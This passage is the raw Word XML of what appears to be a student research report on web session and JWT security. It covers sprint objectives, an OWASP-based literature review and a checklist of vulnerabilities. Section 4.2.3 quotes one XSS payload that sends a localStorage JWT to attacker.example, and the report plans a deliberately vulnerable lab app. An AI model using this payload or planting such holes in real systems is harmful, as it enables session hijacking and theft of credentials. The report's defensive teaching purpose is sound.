            <w:tcW w:type="dxa" w:w="40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Chosen vulnerability scenarios may be too broad or technically difficult within the available time.</w:t>
            </w:r>
          </w:p>
        </w:tc>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Limit scope early and prioritise one or two attack scenarios that are clear and demonstrable.</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Technical</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PoC may not reproduce the intended vulnerability in a stable way.</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Use a minimal architecture, validate the setup early in Sprint 2, avoid unnecessary complexity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Organisational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="40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Limited feedback availability from teacher or external reviewer may delay validation.</w:t>
            </w:r>
          </w:p>
        </w:tc>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Request feedback early and prepare concise review material to make validation easier.</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Planning</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Too much time on implementation may reduce time available for analysis and reporting.</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Use sprint checkpoints and reserve dedicated time in Sprint 3 and Sprint 4 for documentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Sprint 2 — Design &amp; Implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Sprint 2 objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sprint 2 turns the abstract research questions of Sprint 1 into a concrete experimental setup. The deliverables for this sprint are an architectural design, a documented threat model, a working vulnerable variant of the proof-of-concept application, a written-out set of attack scenarios with reproduction steps, and the first set of collected technical evidence (screenshots, request traces, console output).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Design the proof-of-concept architecture and data flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document the threat model and attacker assumptions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement the vulnerable variant of the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Define the four target attack scenarios in reproducible form.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perform the first controlled tests and collect evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirm that responsible disclosure boundaries are respected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Library Research</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This section documents the Library research method as defined in the DOT framework (section 2.5). It reviews authoritative professional and standards-based sources — primarily OWASP guidance, relevant RFCs, and MDN browser security documentation — to establish the theoretical foundation for the proof-of-concept design. The findings here directly answer sub-questions 1, 2, and 5 and inform the threat model in section 4.6 and the scenario selection in section 4.7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.1 Theoretical foundations of session and token security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP is a stateless protocol. Once a user authenticates, the server has no built-in mechanism to associate subsequent requests with that authenticated identity. Two dominant patterns have emerged to bridge this gap: server-side session management using opaque session identifiers carried in cookies, and client-side token-based authentication using cryptographically signed tokens (most commonly JSON Web Tokens) carried in HTTP headers or stored in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The server-side session model, formalised in RFC 6265 (Barth, 2011), stores session state on the server and issues an opaque, randomly generated identifier to the browser as a cookie. Security depends entirely on the secrecy of that identifier and on the correct configuration of the cookie that carries it. The token-based model, formalised for JWTs in RFC 7519 (Jones et al., 2015), moves session state into a signed token that the client stores and presents on each request. Security in this model depends on the signing key, the storage location of the token, and the server’s ability to revoke tokens that should no longer be valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Both models have been in widespread use for over a decade and both have well-documented failure modes. The OWASP Application Security Verification Standard (ASVS) v4.0.3, Chapter V3 (Session Management), and the OWASP Session Management Cheat Sheet provide the most comprehensive practitioner-oriented taxonomy of these failure modes. This research draws primarily on these sources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.2 Common vulnerabilities in token and session handling (Sub-question 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sub-question 1 asks: what are the most common vulnerabilities related to token and session handling in web applications? The literature identifies five primary vulnerability classes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Missing or misconfigured cookie security attributes.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFC 6265 defines three security-relevant attributes for the Set-Cookie header. The Secure attribute restricts the cookie to HTTPS connections, preventing transmission over unencrypted channels. The HttpOnly attribute blocks JavaScript access via document.cookie, limiting the blast radius of a Cross-Site Scripting (XSS) attack. The SameSite attribute (Lax or Strict) restricts cross-site cookie sending, mitigating Cross-Site Request Forgery (CSRF). OWASP ASVS V3.4 requires all three attributes to be present on session cookies (ASVS 3.4.1–3.4.5). When any of these attributes is absent, the session identifier is directly exposed to network eavesdropping, script injection, or cross-site forgery, depending on which attribute is missing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Session fixation.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session fixation is documented in the OWASP Session Management Cheat Sheet and in OWASP ASVS V3.3 (3.3.1). The attack occurs when an application assigns a session identifier before authentication and continues to use the same identifier after the user logs in. An attacker who can plant a pre-chosen identifier in the victim’s browser — for example via a crafted URL or a permissive cookie scope — gains a valid authenticated session without ever knowing the user’s password. The ASVS requires that the session identifier be regenerated on every privilege change and on logout (ASVS 3.3.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure client-side token storage.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The OWASP JSON Web Token Cheat Sheet and MDN Web Docs both warn against storing JWTs in window.localStorage or window.sessionStorage. These browser storage mechanisms are accessible to any script running in the same origin, making them a reliable exfiltration target for XSS payloads. Unlike an HttpOnly cookie, a token in localStorage cannot be hidden from JavaScript. The recommended alternative is to store short-lived access tokens in memory and use an HttpOnly, Secure, SameSite=Strict cookie to carry a refresh token or to transmit the access token itself on each request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Absent server-side token revocation.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFC 7519 specifies that a JWT is self-contained and stateless: any server that trusts the signing key will accept the token until its exp claim expires, regardless of whether the user has since logged out. OWASP ASVS V3.5 (3.5.1–3.5.3) and the JWT Cheat Sheet require that stateless tokens be short-lived and that a revocation mechanism — typically a server-side deny-list keyed by the token’s jti claim — be in place so that logout can be made effective immediately. Without revocation, a token captured at any point during its validity window remains usable after the user explicitly logs out.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting as an amplifier.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS is listed as OWASP Top 10 A03:2021 (Injection). Its relevance to session security is not as a stand-alone issue but as a multiplier: a stored or reflected XSS payload can read tokens from localStorage, extract cookies that lack HttpOnly, redirect the user to an attacker-controlled origin, or silently issue authenticated requests. The OWASP Cross-Site Scripting Prevention Cheat Sheet identifies output encoding and a strict Content Security Policy (CSP) as the primary mitigations. In a session security context, HttpOnly cookies provide an important second line of defence by ensuring that even a successful XSS payload cannot directly read the session identifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.3 Exploitation of insecure storage and transmission (Sub-question 3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sub-question 3 asks: how can insecure storage or transmission of tokens be exploited by an attacker? The literature describes three main exploitation paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Network interception (missing Secure flag / HTTP transport).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> When the Secure attribute is absent from a session cookie, the browser will attach that cookie to requests sent over plain HTTP. A network-adjacent attacker — for example on a shared Wi-Fi network — can capture these requests with a passive sniffer and extract the session identifier without any active intervention. The attack requires no authentication, no prior relationship with the target, and leaves no trace on the application server. RFC 6265 explicitly warns against this and requires the Secure attribute on any cookie that carries authentication state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Script-based token exfiltration (insecure storage + XSS).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> When a JWT is stored in localStorage and the application contains an XSS sink, an attacker can inject a script that reads window.localStorage and sends the token to an attacker-controlled server. A minimal payload of the form fetch(“https://attacker.example/?t=”+localStorage.getItem(“jwt”)) is sufficient. The MDN Web Storage API documentation explicitly notes that localStorage has no security boundary other than same-origin isolation — a boundary that XSS, by definition, has already crossed. The OWASP JWT Cheat Sheet classifies this as a direct consequence of using JavaScript-accessible storage for security tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Token replay after logout (missing revocation).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> When a server issues a JWT without maintaining revocation state, that token acts as a bearer credential that is valid for its full lifetime regardless of user action. An attacker who intercepts or exfiltrates the token — by any means, including the XSS path above — can continue to use it from any HTTP client after the legitimate user has logged out. OWASP ASVS 3.5.2 requires a server-side mechanism to invalidate stateless tokens at logout. The most practical approach is a deny-list checked on each authenticated request, combined with a short access-token lifetime (typically 5–15 minutes) to limit the exposure window even if the deny-list fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.4 Realistic and feasible attack scenarios (Sub-question 2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sub-question 2 asks: which attack scenarios are realistic and feasible for a controlled proof of concept, such as token theft, session fixation, or token reuse? The literature provides both a taxonomy of attack classes and criteria for judging their feasibility in a lab setting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Criteria for scenario selection.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The OWASP Testing Guide (OTG-SESS-001 through OTG-SESS-009) defines a structured set of session management test cases used in professional security assessments. Each test case includes a description of the weakness, the conditions under which it is exploitable, and a procedure that can be reproduced in a controlled environment. The OWASP ASVS similarly groups session requirements by level (L1, L2, L3), with L1 representing baseline controls that any publicly accessible application must have. Vulnerabilities in the L1 category are, by definition, those that are most commonly exploited because they require the least attacker capability to abuse. These two frameworks together provide an objective basis for selecting scenarios that are both realistic (observed in practice) and feasible (reproducible without specialised infrastructure).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Network-based interception (missing Secure flag).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OTG-SESS-002 (Testing for Cookies Attributes) and ASVS 3.4.1 classify the absence of the Secure attribute as an L1 finding. The attack requires only passive traffic capture on a shared network segment, which is achievable with standard tooling (tcpdump, Wireshark) and does not require any application-level access. The OWASP Testing Guide explicitly confirms this scenario as part of routine session testing, making it both realistic and straightforwardly feasible for a proof of concept.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Session fixation.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OTG-SESS-003 (Testing for Session Fixation) is a standard entry in the OWASP Testing Guide. The technique was first formally described by Mitja Kolsek in 2002 and has been exploited in the wild against major web applications. The OWASP guide provides a step-by-step reproduction procedure that maps directly onto a local test environment. The attack requires the ability to set a cookie in the victim’s browser before login, which can be simulated in a controlled lab without any network access beyond the test host, confirming its feasibility for a proof of concept.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">XSS-driven token theft from localStorage.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The combination of localStorage token storage and a stored XSS sink is described in the OWASP JWT Security Cheat Sheet as one of the most commonly observed JWT misconfigurations in real applications. OTG-SESS-009 (Testing JSON Web Tokens) and OTG-CLIENT-007 (Testing Cross-Site Scripting) together cover this attack path. The feasibility is high: the attacker needs only a stored XSS sink in the application (deliberately included in the proof of concept) and a server to receive the exfiltrated token. Both are trivially set up in a local lab environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Token replay after logout.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OTG-SESS-006 (Testing for Logout Functionality) and ASVS 3.5.2 classify the absence of server-side token revocation as an L1 finding. The OWASP Testing Guide describes the test as presenting a previously captured token after logout and observing whether the server accepts it. This is the simplest of the four scenarios to reproduce: it requires only a copy of a previously valid token (captured during normal testing) and a single HTTP request, making it unambiguously feasible in any environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Based on this literature review, all four scenarios are confirmed as realistic (documented in professional testing guides and observed in practice) and feasible (reproducible in a minimal lab environment without specialised infrastructure). This conclusion is consistent with the threat model in section 4.6, which was designed to reflect the same attacker capability boundaries described in the OWASP Testing Guide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.5 Defensive measures from the literature (Sub-question 5 preview)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sub-question 5 (which defensive measures improve security most effectively without unnecessary complexity) will be answered in full in Sprint 3 based on the comparative evaluation. The literature already establishes a clear priority ordering that informs the secure profile design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The OWASP Session Management Cheat Sheet identifies four measures as the highest-impact, lowest-complexity controls: (1) setting Secure, HttpOnly, and SameSite=Lax on all session cookies; (2) regenerating the session identifier on every privilege elevation, including login; (3) destroying the server-side session record on logout rather than merely expiring the client-side cookie; and (4) for JWT-based flows, keeping access tokens short-lived and using an HttpOnly cookie rather than localStorage as the transport mechanism. These four controls directly correspond to the four attack scenarios selected for the proof of concept and will be applied in the SECURE profile in Sprint 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Beyond these baseline controls, the OWASP ASVS V3 defines additional hardening measures such as session binding to additional context (IP block or user-agent hash), Content Security Policy to limit XSS exfiltration, and HTTP Strict Transport Security (HSTS) to prevent protocol downgrade. These will be noted in the comparative evaluation but are not primary research targets given the scope constraints defined in section 2.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.6 Vulnerability checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The table below consolidates the vulnerabilities identified in the literature review into a checklist. Each item is linked to the attack scenario in section 4.7 that demonstrates it and to the OWASP ASVS control that requires its remediation. This checklist serves as the evaluation instrument for the comparative analysis in Sprint 3.</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3026"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="2E75B6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3026" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="2E75B6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="2E75B6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>PoC scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="2E75B6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>ASVS reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Missing cookie flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3026" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Session cookie sent without Secure, HttpOnly, or SameSite, enabling interception, script-based theft, or CSRF.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>S1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ASVS 3.4.1–3.4.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Session fixation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3026" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Session ID not regenerated on login; an attacker can pre-plant an ID and hijack the authenticated session.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>S2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ASVS 3.3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Insecure token storage (localStorage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3026" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">JWT stored in localStorage is readable by any same-origin script, enabling exfiltration via XSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ASVS 3.5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
